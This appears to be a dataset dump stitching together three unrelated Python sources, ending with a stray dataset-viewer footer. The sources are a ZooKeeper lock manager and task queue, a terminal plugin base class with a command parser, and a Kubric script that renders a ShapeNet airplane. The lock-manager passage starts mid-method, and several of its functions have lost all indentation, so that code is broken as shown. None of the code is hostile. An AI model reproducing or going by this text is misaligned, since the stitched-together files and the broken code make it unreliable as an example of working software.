                # this type of exception
                raise LockAlreadyAcquiredError(lock_id=lockid)
            yield
        except LockTimeout:
            logger.info('Failed to acquire lock {} due to timeout ({} seconds)'.format(
                lockid, timeout))
            raise LockFailedError(lock_id=lockid)
        except LockAlreadyAcquiredError:
            raise
        except LockError as e:
            logger.error('Failed to acquire lock {0}: {1}\n{2}'.format(
                lockid, e, traceback.format_exc()))
            raise
        finally:
            # NOTE(review): release is invoked even when acquire failed —
            # assumed to be safe on an unacquired lock; confirm against Lock.
            lock.release()
def persistent_locks_acquire(self, locks, data=''):
try:
retry = self._retry.copy()
result = retry(self._inner_persistent_locks_acquire, locks=locks, data=data)
except RetryFailedError:
raise LockError('Failed to acquire persistent locks {} after several retries'.format(
locks))
except KazooException as e:
logger.error('Failed to fetch persistent locks {0}: {1}\n{2}'.format(
locks, e, traceback.format_exc()))
raise LockError
return result
def _inner_persistent_locks_acquire(self, locks, data):
ensured_paths = set()
tr = self.client.transaction()
for lockid in locks:
path = self.lock_path_prefix + lockid
parts = path.rsplit('/', 1)
if len(parts) == 2 and parts[0] not in ensured_paths:
self.client.ensure_path(parts[0])
ensured_paths.add(parts[0])
tr.create(path, data)
failed = False
failed_locks = []
result = tr.commit()
for i, res in enumerate(result):
if isinstance(res, ZookeeperError):
failed = True
if isinstance(res, NodeExistsError):
failed_locks.append(locks[i])
if failed_locks:
holders = []
for f in failed_locks:
# TODO: fetch all holders with 1 transaction request
holders.append((f, self.client.get(self.lock_path_prefix + f)))
foreign_holders = [(l, h) for l, h in holders if h[0] != data]
failed_lock, holder_resp = foreign_holders and foreign_holders[0] or holders[0]
holder = holder_resp[0]
holders_ids = list(set(h[0] for _, h in holders))
logger.warn('Persistent lock {0} is already set by {1}'.format(failed_lock, holder))
raise LockAlreadyAcquiredError(
'Lock for {0} is already acquired by job {1}'.format(failed_lock, holder),
lock_id=failed_lock, holder_id=holder,
lock_ids=failed_locks, holders_ids=holders_ids)
elif failed:
logger.error('Failed to set persistent locks {0}, result: {1}'.format(
locks, result))
raise LockError
return True
def get_children_locks(self, lock_prefix):
try:
retry = self._retry.copy()
result = retry(self.__inner_get_children_locks, lock_prefix)
except RetryFailedError:
raise LockError('Failed to get fetch children locks for {}'.format(
lock_prefix))
return result
def __inner_get_children_locks(self, lock_prefix):
full_path = self.lock_path_prefix + lock_prefix
self.client.ensure_path(os.path.normpath(full_path))
result = self.client.get_children(full_path)
return ['{0}{1}'.format(lock_prefix, lock) for lock in result]
def persistent_locks_release(self, locks, check=''):
try:
retry = self._retry.copy()
result = retry(self.__inner_persistent_locks_release, locks=locks, check=check)
except RetryFailedError:
raise LockError(
'Failed to release persistent locks {} after several retries'.format(locks)
)
except KazooException as e:
logger.error('Failed to remove persistent locks {0}: {1}\n{2}'.format(
locks, e, traceback.format_exc()))
raise LockError
return result
def __inner_persistent_locks_release(self, locks, check):
for lockid in locks:
try:
if check:
data = self.client.get(self.lock_path_prefix + lockid)
if data[0] != check:
logger.error(
'Lock {lock_id} has inconsistent data: {current_data}, '
'expected {expected_data}'.format(
lock_id=lockid,
current_data=data[0],
expected_data=check,
)
)
raise InconsistentLockError(lock_id=lockid, holder_id=data[0])
self.client.delete(self.lock_path_prefix + lockid)
except NoNodeError:
logger.warn('Persistent lock {0} is already removed'.format(lockid))
pass
return True
class ZkCacheTaskManager(object):
    """Cache-task queue manager: one ZooKeeper-backed locking queue per group."""
    RETRIES = 2
    def __init__(self, host='127.0.0.1:2181', lock_path_prefix='/mastermind/cache/'):
        """Connect to ZooKeeper and remember the (encoded) queue path prefix."""
        self.client = KazooClient(host, timeout=3)
        logger.info('Connecting to zookeeper host {}, lock_path_prefix: {}'.format(
            host, lock_path_prefix))
        try:
            self.client.start()
        except Exception as e:
            logger.error(e)
            raise
        self.lock_path_prefix = helpers.encode(lock_path_prefix)
    def put_task(self, task):
        """Serialize ``task`` and enqueue it on the queue of its 'group'."""
        queue = LockingQueue(self.client, self.lock_path_prefix, task['group'])
        return queue.put(self._serialize(task))
    def put_all(self, tasks):
        """Enqueue every task in ``tasks``."""
        for entry in tasks:
            self.put_task(entry)
    def list(self):
        """Yield every queued task across all groups, deserialized."""
        group_ids = self.client.retry(self.client.get_children, self.lock_path_prefix)
        for group_id in group_ids:
            queue = LockingQueue(self.client, self.lock_path_prefix, group_id)
            for raw in queue.list():
                yield self._unserialize(raw)
    @staticmethod
    def _serialize(task):
        # Tasks are stored in ZooKeeper as msgpack blobs.
        return msgpack.packb(task)
    @staticmethod
    def _unserialize(task):
        return msgpack.unpackb(task)
|
class PluginBase(object):
    """Base class for terminal-system plugins.

    Subclasses set ``name``, ``doc`` and ``methods_subclass`` (a mapping of
    method name -> help text). ``handle_input`` dispatches a text command of
    the form ``"<fname> <method> [args] [key=value ...]"`` to the matching
    method on the plugin instance.
    """
    name = ''
    doc = 'doc about this class'
    # Subclasses register their dispatchable methods (name -> help text) here.
    methods_subclass = {}
    def __init__(self, **kwargs):
        # Per-instance dispatch table: base methods plus subclass additions.
        self.methods = {
            'help': 'doc about help method',
            'get_methods': 'doc about get_methods method'
        }
        self.methods.update(self.methods_subclass)
    def on_import(self, term_system):
        """Hook invoked when the plugin is imported; default does nothing."""
        pass
    def get_methods(self):
        """Return the names of all dispatchable methods."""
        return list(self.methods)
    def help(self, method_name):
        """Return the help text for ``method_name[0]`` or a not-found message."""
        doc = self.methods.get(method_name[0], None)
        if doc:
            ret = doc
        else:
            ret = '# %s: %s: %s not found' % (
                self.name, 'help', method_name)
        return ret
    @staticmethod
    def get_args_kwargs_from_text(text):
        """Parse ``text`` into positional args and ``key=value`` kwargs.

        Quoted substrings (single or double quotes) are kept intact as single
        positional tokens, and an ``=`` that occurs only inside the quoted
        part of a token does not turn it into a kwarg. Returns
        ``(args_list, kwargs_dict)`` with every value kept as a string.
        """
        # (active quote character, index where that quote opened)
        start_str = (None, -1)
        strings_found = []
        kwargs_found = {}
        args_found = []
        for i, char in enumerate(text):
            if char in ("'", '"'):
                if start_str[0]:
                    if char == start_str[0]:
                        # Closing quote: extend the span left to the nearest
                        # space so a prefix like key=' stays attached.
                        rev = text[:i+1][::-1]
                        b = rev[i+1 - start_str[1]:].find(' ')
                        if b != -1:
                            strings_found.append((start_str[1] - b, i+1))
                        else:
                            strings_found.append((start_str[1], i+1))
                        start_str = (None, -1)
                else:
                    start_str = (char, i)
        if strings_found:
            last_end = 0
            for start, end in strings_found:
                # Plain (unquoted) words that precede this quoted span.
                before = text[last_end:start]
                for x in before.split(' '):
                    if x:
                        args_found.append(x)
                args_found.append(text[start:end])
                last_end = end
            # Plain words after the last quoted span.
            for x in text[end:].split(' '):
                if x:
                    args_found.append(x)
        else:
            args_found = text.split(' ')
        # Second pass: move "key=value" tokens into kwargs, unless the '='
        # only appears inside the quoted portion of the token.
        remlist = []
        for i, x in enumerate(args_found):
            a = x.find('=')
            if a != -1:
                yes = False
                c = x.find("'")
                b = x.find('"')
                if b == -1 and c == -1:
                    yes = True
                else:
                    start = b
                    if c != -1 and c < b:
                        start = c
                    a = x[:start].find('=')
                    if a != -1:
                        yes = True
                if yes:
                    kwargs_found[x[:a]] = x[a+1:]
                    remlist.append(i)
        # Delete in reverse so earlier indices stay valid.
        for x in reversed(remlist):
            del args_found[x]
        return args_found, kwargs_found
    @staticmethod
    def get_from_locals_globals(term_system, text):
        """Look up ``text`` in the terminal's exec locals, then its globals."""
        ret = term_system.exec_locals.get(text, None)
        if not ret:
            ret = term_system.get_globals().get(text, None)
        return ret
    @staticmethod
    def slice_fname(text):
        """Split ``text`` at the first space into ``(first_word, rest)``.

        Either element may be '' when absent.
        """
        fname = ''
        text2 = ''
        if text:
            b = text.find(' ')
            if b != -1:
                text2 = text[b+1:]
                fname = text[:b]
            else:
                fname = text
        return fname, text2
    @staticmethod
    def get_method_args(text):
        """Split ``text`` on spaces into ``(fname, method, args_tuple)``."""
        fname = ''
        method = ''
        args = []
        if text:
            aspl = text.split(' ')
            fname = aspl[0]
            if len(aspl) > 1:
                method = aspl[1]
            if len(aspl) > 2:
                args = aspl[2:]
        return fname, method, tuple(args)
    @staticmethod
    def get_method_args_kwargs(text):
        """Like ``get_method_args`` but also parses ``key=value`` kwargs."""
        fname, method, args, kwargs = '', '', [], {}
        if text:
            aspl = text.split(' ')
            fname = aspl[0]
            if len(aspl) > 1:
                method = aspl[1]
            if len(aspl) > 2:
                args, kwargs = PluginBase.get_args_kwargs_from_text(
                    ' '.join(aspl[2:]))
        return fname, method, tuple(args), kwargs
    def handle_input(self, term_system, term_globals, exec_locals, text):
        """Dispatch ``text`` to one of this plugin's registered methods.

        Returns the method's result, or a not-found message listing the
        available methods when the method is unknown or missing.
        """
        fname, method, args, kwargs = self.get_method_args_kwargs(text)
        found = False
        if method in self.methods:
            m = getattr(self, method, None)
            if m:
                found = True
                # args/kwargs may each be empty; *args/**kwargs covers all
                # four combinations the old code dispatched on separately.
                result = m(*args, **kwargs)
        if not found:
            result = (
                '# %s: Method "%s" not found\n'
                '# Available methods are %s\n'
                '# Type "help [method_name]" for help') % (
                self.name, method, self.get_methods())
        return result
|
# Copyright 2022 The Kubric Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import numpy as np
import kubric as kb
from kubric.renderer import Blender
# TODO: go to https://shapenet.org/ create an account and agree to the terms
# then find the URL for the kubric preprocessed ShapeNet and put it here:
SHAPENET_PATH = "gs://KUBRIC_SHAPENET_PATH/ShapeNetCore.v2.json"
# Fail fast while the placeholder path above has not been replaced.
if SHAPENET_PATH == "gs://KUBRIC_SHAPENET_PATH/ShapeNetCore.v2.json":
  raise ValueError("Wrong ShapeNet path. Please visit https://shapenet.org/ "
                   "agree to terms and conditions, and find the correct path.")
# --- CLI arguments
parser = kb.ArgumentParser()
parser.set_defaults(
  frame_end=5,
  resolution=(512, 512),
)
FLAGS = parser.parse_args()
# --- Common setups & resources
scene, rng, output_dir, scratch_dir = kb.setup(FLAGS)
renderer = Blender(scene, scratch_dir,
                   samples_per_pixel=64,
                   background_transparency=True)
shapenet = kb.AssetSource.from_manifest(SHAPENET_PATH)
# --- Add Klevr-like lights to the scene
scene += kb.assets.utils.get_clevr_lights(rng=rng)
scene.ambient_illumination = kb.Color(0.05, 0.05, 0.05)
# --- Add shadow-catcher floor
floor = kb.Cube(name="floor", scale=(100, 100, 1), position=(0, 0, -1))
scene += floor
# Make the floor transparent except for catching shadows
# Together with background_transparency=True (above) this results in
# the background being transparent except for the object shadows.
floor.linked_objects[renderer].cycles.is_shadow_catcher = True
# --- Keyframe the camera
# A fresh random position in a half-sphere shell is sampled per frame,
# always looking at the origin where the object sits.
scene.camera = kb.PerspectiveCamera()
for frame in range(FLAGS.frame_start, FLAGS.frame_end + 1):
  scene.camera.position = kb.sample_point_in_half_sphere_shell(1.5, 1.7, 0.1)
  scene.camera.look_at((0, 0, 0))
  scene.camera.keyframe_insert("position", frame)
  scene.camera.keyframe_insert("quaternion", frame)
# --- Fetch a random (airplane) asset
# NOTE(review): reaches into the private ``_assets`` mapping of AssetSource —
# confirm there is no public API for listing assets by category.
airplane_ids = [name for name, spec in shapenet._assets.items()
                if spec["metadata"]["category"] == "airplane"]
asset_id = rng.choice(airplane_ids)  #< e.g. 02691156_10155655850468db78d106ce0a280f87
obj = shapenet.create(asset_id=asset_id)
logging.info(f"selected '{asset_id}'")
# --- make object flat on X/Y and not penetrate floor
# Rotate 90 degrees about X, then lift so the asset's bounding-box bottom
# (aabbox[0][2]) sits exactly on z=0.
obj.quaternion = kb.Quaternion(axis=[1, 0, 0], degrees=90)
obj.position = obj.position - (0, 0, obj.aabbox[0][2])
scene.add(obj)
# --- Rendering
logging.info("Rendering the scene ...")
renderer.save_state(output_dir / "scene.blend")
data_stack = renderer.render()
# --- Postprocessing
# Remap segmentation ids so the single object gets a compact uint8 label.
kb.compute_visibility(data_stack["segmentation"], scene.assets)
data_stack["segmentation"] = kb.adjust_segmentation_idxs(
    data_stack["segmentation"],
    scene.assets,
    [obj]).astype(np.uint8)
kb.file_io.write_rgba_batch(data_stack["rgba"], output_dir)
kb.file_io.write_depth_batch(data_stack["depth"], output_dir)
kb.file_io.write_segmentation_batch(data_stack["segmentation"], output_dir)
# --- Collect metadata
logging.info("Collecting and storing metadata for each object.")
data = {
  "metadata": kb.get_scene_metadata(scene),
  "camera": kb.get_camera_info(scene.camera),
  "object": kb.get_instance_info(scene, [obj])
}
kb.file_io.write_json(filename=output_dir / "metadata.json", data=data)
kb.done()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.